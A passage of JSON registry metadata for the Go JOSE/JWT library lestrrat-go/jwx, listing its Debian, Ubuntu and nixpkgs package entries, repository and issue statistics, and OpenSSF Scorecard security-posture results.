detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.744Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/golang-github-lestrrat-go-jwx?arch=source\u0026distro=debian-13\u0026repository_url=https://packages.debian.org/trixie","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/golang-github-lestrrat-go-jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/golang-github-lestrrat-go-jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/golang-github-lestrrat-go-jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-lestrrat-go-jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-lestrrat-go-jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-lestrrat-go-jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-lestrrat-go-jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-lestrrat-go-jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/golang-github-lestrrat-go-jwx/codemeta","maintainers":[],"registry":{"name":"debian-13","url":"https://packages.debian.org/trixie","ecosystem":"debian","default":false,"packages_count":38024,"maintainers_count":0,"namespaces_count":4,"keywords_count":1987,"github":"debian","metadata":{"codename":"trixie","funded_packages_count":316},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.448Z","updated_at":"2026-06-10T05:17:04.542Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/namespaces"}},{"id":13448697,"name":"golang-github-lestrrat-go-jwx","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/lestrrat-go/jwx","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-08T15:55:50.067Z","latest_release_published_at":"2026-02-08T15:55:50.067Z","latest_release_number":"1.2.30-1","last_synced_at":"2026-03-08T16:50:33.011Z","created_at":"2026-02-08T15:55:49.457Z","updated_at":"2026-03-25T17:02:36.749Z","registry_url":"https://launchpad.net/ubuntu/+source/golang-github-lestrrat-go-jwx","install_command":"apt-get install golang-github-lestrrat-go-jwx","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"golang-github-lestrrat-go-jwx-dev","standards_version":"4.7.0","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-sequence-golang, golang-any, golang-github-lestrrat-go-backoff-dev, golang-github-lestrrat-go-blackmagic-dev, golang-github-lestrrat-go-httpcc-dev, golang-github-lestrrat-go-iter-dev, golang-github-lestrrat-go-option-dev, golang-github-pkg-errors-dev, golang-github-stretchr-testify-dev, golang-golang-x-crypto-dev","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.747Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/golang-github-lestrrat-go-jwx?arch=source\u0026distro=ubuntu-24.10\u0026repository_url=https://launchpad.net/ubuntu/oracular","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/golang-github-lestrrat-go-jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/golang-github-lestrrat-go-jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/golang-github-lestrrat-go-jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-lestrrat-go-jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-lestrrat-go-jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-lestrrat-go-jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-lestrrat-go-jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-lestrrat-go-jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-lestrrat-go-jwx/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.10","url":"https://launchpad.net/ubuntu/oracular","ecosystem":"ubuntu","default":false,"packages_count":38437,"maintainers_count":0,"namespaces_count":4,"keywords_count":1473,"github":"ubuntu","metadata":{"codename":"oracular","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":214},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.028Z","updated_at":"2026-06-10T05:17:05.787Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/namespaces"}},{"id":12808597,"name":"jwx","ecosystem":"nixpkgs","description":"Implementation of various JWx (Javascript Object Signing and Encryption/JOSE) technologies","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T15:56:30.344Z","latest_release_published_at":"2026-01-26T15:56:30.344Z","latest_release_number":"3.0.13","last_synced_at":"2026-03-06T09:24:49.703Z","created_at":"2026-01-26T15:56:29.877Z","updated_at":"2026-03-25T17:02:36.761Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=jwx","install_command":"nix-env -iA nixpkgs.jwx","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/by-name/jw/jwx/package.nix#L23","metadata":{"nix_attribute":"jwx-3.0.13","position":"pkgs/by-name/jw/jwx/package.nix:23","platforms":["x86_64-darwin","aarch64-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","wasm64-wasi","wasm32-wasi","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fj